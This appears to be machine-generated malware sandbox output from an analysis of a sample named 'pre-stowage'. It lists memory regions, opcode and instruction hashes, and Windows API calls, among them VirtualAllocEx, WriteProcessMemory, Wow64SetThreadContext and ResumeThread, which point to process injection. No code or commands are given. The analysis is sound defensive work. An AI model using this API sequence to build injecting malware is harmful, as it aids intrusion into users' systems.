• Instruction ID: 3f77a18f396f421e4c3446c437d2ef0a1981bab182005afe7fa04555ee1d3f3e
• Opcode Fuzzy Hash: 06bf2a1fef69a8b651c53ec9f31b31159969223e919e837402bda549bc8a24cc
• Instruction Fuzzy Hash: E93166B190135A9FCB12CFA9D880ADEBFF4EF09320F14406AE814A7251C7759944CBA1
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 094AA138
Memory Dump Source
• Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: cebf55ee283f08bc92c89113f2e5a882c9e37823eaadaab4bb0a0ff489af7ee2
• Instruction ID: dd001356c6adcad092473ceb226b1f8eb6a45b2f0b3d7f8ae2980a4269633a95
• Opcode Fuzzy Hash: cebf55ee283f08bc92c89113f2e5a882c9e37823eaadaab4bb0a0ff489af7ee2
• Instruction Fuzzy Hash: CA211375D003199FDB10CFA9C885BEEBBF5FF48310F50842AE959A7240C7799941CBA4
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 094AA138
Memory Dump Source
• Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 3463a387071972920ea9f4ee6247e0c94a9f9a1886a8808900c988fd53113323
• Instruction ID: 79f69f2348f05075435e03c3b5f6a237cdf89438c472c0c82e7a7d119892482e
• Opcode Fuzzy Hash: 3463a387071972920ea9f4ee6247e0c94a9f9a1886a8808900c988fd53113323
• Instruction Fuzzy Hash: 3E2123B1D003099FDB10DFAAC881BEEBBF5FF48310F50842AE918A7240C7799941CBA4
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 079500D7
Memory Dump Source
• Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: d50f928d3ab5a35daa13c0160829f581b06f5481077cb8cf2cbc92d6ed175e76
• Instruction ID: 8f3608ac9645ad6c3f9ae0f941df79f58ec3f507a362ee21b8cf1c84dbe9a3d5
• Opcode Fuzzy Hash: d50f928d3ab5a35daa13c0160829f581b06f5481077cb8cf2cbc92d6ed175e76
• Instruction Fuzzy Hash: CC21C3B5D003199FDB10CFAAD880A9EFBF5FB48324F14842AE919A7210D775A945CFA0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 094A9B56
Memory Dump Source
• Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: f502458ed9ffd516edf9ccfd783701c8f658403d48bf3ea327c8af94f11d9c2b
• Instruction ID: 8f72b3816ba2f85848c74793c37f93bf64ed4531be5f368aa5b6f31c7de736be
• Opcode Fuzzy Hash: f502458ed9ffd516edf9ccfd783701c8f658403d48bf3ea327c8af94f11d9c2b
• Instruction Fuzzy Hash: DA213471D003099FDB14DFAAC485BEEBBF4EF48320F50842AE519A7240CB789945CBA4
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 094AA218
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 48b1931a318a9a729ac3c56a9d2cbbf0fff39977e139733b71b9387a1b106441
                                                                                                        • Instruction ID: 7d7ddb2d0c719e46db52f8c181af0cea1aaa2adfefdedfd8a8d9497390470f2f
                                                                                                        • Opcode Fuzzy Hash: 48b1931a318a9a729ac3c56a9d2cbbf0fff39977e139733b71b9387a1b106441
                                                                                                        • Instruction Fuzzy Hash: 45210371C013499FDB10DFAAC885BEEBBF5FF48310F50842AE919A7250C7399945DBA4
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2D82F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 93de5b18da4590222d1b41e354d3a0af4b75294252400db06a608443b34fafa1
                                                                                                        • Instruction ID: b35dedf759abf243a157ee15785ea168abbcb4dfacdc8be1500b22168e2a149b
                                                                                                        • Opcode Fuzzy Hash: 93de5b18da4590222d1b41e354d3a0af4b75294252400db06a608443b34fafa1
                                                                                                        • Instruction Fuzzy Hash: 952112B6D00248DFDB10CFA9D985BEEBBF5FB48310F14806AE918A7210C338A945CF60
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 094A9B56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 428b46416e1121809d2bc4523e5230e757cb1cc80cb65246647f56cec2b20162
                                                                                                        • Instruction ID: 7a3ee068995c65277eea0a64ceddb6c81a237606774837294d86b3e73288cc60
                                                                                                        • Opcode Fuzzy Hash: 428b46416e1121809d2bc4523e5230e757cb1cc80cb65246647f56cec2b20162
                                                                                                        • Instruction Fuzzy Hash: 4D210471D003098FDB10DFAAC485BEEBBF5AB48220F54842AD559A7240CB78A945CFA4
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 094AA218
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 8f296ee1beb8ec8e8c147a74af2dbb557f095917cf9cb4c0d10309ff11dedf43
                                                                                                        • Instruction ID: 0e91cca461403ae9b115fd345822f512f77d1593d89ef4b5eef5677e190d46c3
                                                                                                        • Opcode Fuzzy Hash: 8f296ee1beb8ec8e8c147a74af2dbb557f095917cf9cb4c0d10309ff11dedf43
                                                                                                        • Instruction Fuzzy Hash: 57212571C003499FDB10DFAAC881BEEBBF5FF48310F50842AE918A7240C7399941DBA4
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2D82F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 2c1f37babcfdb0d0834620a546d9d617b493cceeaaf81458d8f396d289ee53e3
                                                                                                        • Instruction ID: a71f9bc44b7c37247bfc858a3f4cbc888e2deb5803a5610405313a218b8498b7
                                                                                                        • Opcode Fuzzy Hash: 2c1f37babcfdb0d0834620a546d9d617b493cceeaaf81458d8f396d289ee53e3
                                                                                                        • Instruction Fuzzy Hash: 8421E4B5D002089FDB10CFAAD985ADEBBF5FB48310F14801AE918A3350D375A944CFA4
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 094AA056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 639a63c4a60b01dc5e50ed0a83a5fa8b9fabcc9e55410765eb0e862f2f17e276
                                                                                                        • Instruction ID: 63b3c31545fc858cecb6b60f9dbd89a046940bc74c68b8a430b2eeaa83d506a4
                                                                                                        • Opcode Fuzzy Hash: 639a63c4a60b01dc5e50ed0a83a5fa8b9fabcc9e55410765eb0e862f2f17e276
                                                                                                        • Instruction Fuzzy Hash: 0D2124718002499FDB24DFA9C845BEFBBF5EF48310F14841AE919A7250C7759940CFA4
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0795DA83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: ba5abfc03788954f12f9258884b35e2d0cbcb2314ce8e020d13363351ef4c931
                                                                                                        • Instruction ID: e97b3d011ec4cdff8c57ba89776268e7c871194ee03d7d5d54fce1ccc9b8c8b7
                                                                                                        • Opcode Fuzzy Hash: ba5abfc03788954f12f9258884b35e2d0cbcb2314ce8e020d13363351ef4c931
                                                                                                        • Instruction Fuzzy Hash: 3921F4B5D003599FCB10DF9AD485BDEBBF4EB48320F108429E958A7250D778A945CFA1
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0795DA83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 9572c42f94ad7e464135f0f7ab16ba213bb05f664accef5777b8143b847b463d
                                                                                                        • Instruction ID: df343aa1087801d18985bb9823726137ddce79df8bc5b7dbd3c250a91a8d0278
                                                                                                        • Opcode Fuzzy Hash: 9572c42f94ad7e464135f0f7ab16ba213bb05f664accef5777b8143b847b463d
                                                                                                        • Instruction Fuzzy Hash: C02103B5D003499FCB10DF9AC885BDEFBF4EB48320F108429E958A7250D378AA44CFA1
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 094AA056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 658694eda010a9661b71caafd0fbab3728c7e100e51f5ca3b216e5a5baf27662
                                                                                                        • Instruction ID: 7af33c76cbc5bc537d7a21311ac8aac8fac94512f321de769d6fbdfeab064348
                                                                                                        • Opcode Fuzzy Hash: 658694eda010a9661b71caafd0fbab3728c7e100e51f5ca3b216e5a5baf27662
                                                                                                        • Instruction Fuzzy Hash: 3F112671C003499FDB20DFAAC845BEFBBF5EB48324F14841AE919A7250CB769944CFA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 25972039538b211ae504176718078a8087fd84cbab5863b5e1b5794f7fe56237
                                                                                                        • Instruction ID: d4faff84e513432cc9e7790ab986c58478c92fd10d12ff8ae39b996bf56beb4e
                                                                                                        • Opcode Fuzzy Hash: 25972039538b211ae504176718078a8087fd84cbab5863b5e1b5794f7fe56237
                                                                                                        • Instruction Fuzzy Hash: D7115575D003498FDB20DFAAC4457EEFBF5AF88320F24852AD559A7640CB39A941CFA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 6c0acb78c8a04145f348ea1971048562eb4128e040e977c6db14ebb91ae67078
                                                                                                        • Instruction ID: ea4e5799abc2eaef201cbb75ae75002703618c9f18c3f9eacc5043ccf2be44da
                                                                                                        • Opcode Fuzzy Hash: 6c0acb78c8a04145f348ea1971048562eb4128e040e977c6db14ebb91ae67078
                                                                                                        • Instruction Fuzzy Hash: CB113675D003498FDB20DFAAC4457AFFBF5EB88320F64842AD519A7240CB79A941CFA4
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02E2B546
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: e0b465f60803dbef39ce7663c565fed8407f2bcab24cc93b40fcb9a36e66a4c8
                                                                                                        • Instruction ID: 599d6b5eec2846f43fcfec0fa7280d227090c03bbae44f1b467daf750c78ffe1
                                                                                                        • Opcode Fuzzy Hash: e0b465f60803dbef39ce7663c565fed8407f2bcab24cc93b40fcb9a36e66a4c8
                                                                                                        • Instruction Fuzzy Hash: CB11D2B5C002598FDB10DF9AD445B9EFBF9AB48314F10842AD519A7210C379A545CFA5
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 094ACF75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 219295f14f9259e16a6c536d7722aff68982eab3b3869e4c260611ed086baad1
                                                                                                        • Instruction ID: 4265dcedcf357665a2bcb3e7320c69fc81fef1d75c389b258d87461c423a0f4b
                                                                                                        • Opcode Fuzzy Hash: 219295f14f9259e16a6c536d7722aff68982eab3b3869e4c260611ed086baad1
                                                                                                        • Instruction Fuzzy Hash: F211F2B58043499FDB20DF9AC985BEEBBF8EB58321F10841AE558A7240C375A944CFA1
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 094ACF75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 3a993e11bb35dca22b0981f64a3778ed9052a1008897e3b05b00b0d0edbdf180
                                                                                                        • Instruction ID: e87bb97e6d807f67d23aa7077f50cee2474dfe9381d305532eab2614f9ef8a97
                                                                                                        • Opcode Fuzzy Hash: 3a993e11bb35dca22b0981f64a3778ed9052a1008897e3b05b00b0d0edbdf180
                                                                                                        • Instruction Fuzzy Hash: 2A11F2B5800349DFDB20CF99D886BEFBBF8EB48314F10841AE559A7650C375A944CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 99835def08c2c6621f73bf5a9f519704e0fea5aa7140b7be1384a4ade329c9bc
                                                                                                        • Instruction ID: 917c1c683899e50d450e6f1a38622fd5e4cd8673b612c064fef3ce1d686bf9c4
                                                                                                        • Opcode Fuzzy Hash: 99835def08c2c6621f73bf5a9f519704e0fea5aa7140b7be1384a4ade329c9bc
                                                                                                        • Instruction Fuzzy Hash: 9421F275604304DFDB1ADF14D9C4B56BB65EF84324F24C56DE80E4B296C336D846CA62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 86dbacf430098c3bdcd08d769d34aaaf44fe70a5e41763b50369666cf628a16c
                                                                                                        • Instruction ID: 7cdaea817bc45913f8a8a597f701fbc35b797f5b2977548383be88efebbc9933
                                                                                                        • Opcode Fuzzy Hash: 86dbacf430098c3bdcd08d769d34aaaf44fe70a5e41763b50369666cf628a16c
                                                                                                        • Instruction Fuzzy Hash: B621F275A043409FDB06DF10D9C0B66BB65FF88324F24C5ADE84A4B242C336D846CB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction ID: 2d105ce3e0b8ad3ebd742fdba8469a0be81b4aa225323bbb63acb729f3dbecae
                                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction Fuzzy Hash: 44119075904280DFCB06CF54D5C4B55BF61FF84318F24C6ADD84A4B656C33AD94ACB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1318590638.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cbd000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction ID: c40b0dedf8598f023cb5155044740fb4a5a8b794a064752d641f3c76ce2908da
                                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                        • Instruction Fuzzy Hash: C01179755442809FCB0ACF14D584B55BBA2FB84228F24C6A9D84A4B696C33AE54ACF62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1317644523.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cad000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 87d0263d05af7b64dc2825f2c618ef71d52530c9fc36ca6e26d47fa9324bcd69
                                                                                                        • Instruction ID: b511561fd06b08caeabdd28f9a46562384dc86fe4363464521f27569c7bc308b
                                                                                                        • Opcode Fuzzy Hash: 87d0263d05af7b64dc2825f2c618ef71d52530c9fc36ca6e26d47fa9324bcd69
                                                                                                        • Instruction Fuzzy Hash: 53012B310083449EE7248E16DCC4B66FFD8EF81629F04C029EC4A8E686C3389880CA72
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1317644523.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2cad000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f652ebe41dc7b95783e5b4392e80b4e90c88a77fb6e96e54c60e1744b133df4
                                                                                                        • Instruction ID: 3156ef31a0ea71685b0e4f33e251f4ddeb5262cdbb00d5f6f0b70fa9434a01da
                                                                                                        • Opcode Fuzzy Hash: 6f652ebe41dc7b95783e5b4392e80b4e90c88a77fb6e96e54c60e1744b133df4
                                                                                                        • Instruction Fuzzy Hash: 1DF06D71408344AEE7248E16D888B62FFD8EB85639F18C55AED494E686C379AC44CAB1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {#L
                                                                                                        • API String ID: 0-1361971085
                                                                                                        • Opcode ID: beb2b65b64f69a5555b92084f0906b314ccd71ace67eaae09988ca3f6df7fd9a
                                                                                                        • Instruction ID: 89fca736fabbf5778fcd86cf68314ae6dac355b40eec666a812a5c6273d80cdd
                                                                                                        • Opcode Fuzzy Hash: beb2b65b64f69a5555b92084f0906b314ccd71ace67eaae09988ca3f6df7fd9a
                                                                                                        • Instruction Fuzzy Hash: F9D1F5B0E05619DFCB18CFAAD98069EFBF2BF99340F14D52AD419AB224D7349902CF54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {#L
                                                                                                        • API String ID: 0-1361971085
                                                                                                        • Opcode ID: 600c9117abf5a6e575fa8c6d5a32a167f6d2f52bf3d1bc6f93070710ede78855
                                                                                                        • Instruction ID: 6b304ac297e499f823952251f89255ee8608ec59741b20169c5e2624c743f89b
                                                                                                        • Opcode Fuzzy Hash: 600c9117abf5a6e575fa8c6d5a32a167f6d2f52bf3d1bc6f93070710ede78855
                                                                                                        • Instruction Fuzzy Hash: 82D1F5B0E05619DFCB18CFAAD98069EFBF2BF99340F14D52AD419AB224D7349902CF54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TVV
                                                                                                        • API String ID: 0-2552715165
                                                                                                        • Opcode ID: 4dbdf7b4a9638872271b89f36d3f6b25cbe9d81a4c95a41d9d699ab3193e1143
                                                                                                        • Instruction ID: 911835352fd6f5dd46317428dc19e89143806f8dcec6df36f567d262f6e5a40a
                                                                                                        • Opcode Fuzzy Hash: 4dbdf7b4a9638872271b89f36d3f6b25cbe9d81a4c95a41d9d699ab3193e1143
                                                                                                        • Instruction Fuzzy Hash: 12E1D974E006198FDB14DF99C680AAEBBB2FF89305F24C26AE414AB355D7359D41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L?V
                                                                                                        • API String ID: 0-1250744386
                                                                                                        • Opcode ID: 01ab87480a8ae5c90f098544532668cebc8e4f4a06a31023670e35e1597a785c
                                                                                                        • Instruction ID: 961a40e84d0465870319e997b1c3e0c9cc2dbc58bbb65eaf9ded383594c64156
                                                                                                        • Opcode Fuzzy Hash: 01ab87480a8ae5c90f098544532668cebc8e4f4a06a31023670e35e1597a785c
                                                                                                        • Instruction Fuzzy Hash: 68E1C874E002198FDB24DF99C680AAEBBB2FF49314F24C26AE414AB355D735AD41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @RV
                                                                                                        • API String ID: 0-1079328649
                                                                                                        • Opcode ID: 76f540070ab66ce75d2e8660ba28461b5fe03ee37782fa6464fba6c7d77cf11e
                                                                                                        • Instruction ID: da36cc98d4ac61d856707bc5b1ec8d5ec9a5a325b997912af44d057b15193c14
                                                                                                        • Opcode Fuzzy Hash: 76f540070ab66ce75d2e8660ba28461b5fe03ee37782fa6464fba6c7d77cf11e
                                                                                                        • Instruction Fuzzy Hash: D0E1D974E042198FDB14DF99C680AAEBBB2FF89304F24C26AD414A7355D7359D41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4AV
                                                                                                        • API String ID: 0-3127383403
                                                                                                        • Opcode ID: 515ea108b0a98422fd98e19a1774d5205da1559302a4cd741179ece127815798
                                                                                                        • Instruction ID: 1b1c25ca16c1e3a7677ca16593e34c3d4ad18c5597ddf23dc8b80de7a5d227ba
                                                                                                        • Opcode Fuzzy Hash: 515ea108b0a98422fd98e19a1774d5205da1559302a4cd741179ece127815798
                                                                                                        • Instruction Fuzzy Hash: D4E1E974E002198FDB24DFA9C680AAEBBB2FF89314F24826AD414A7355D735AD41CF60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 98R
                                                                                                        • API String ID: 0-576591972
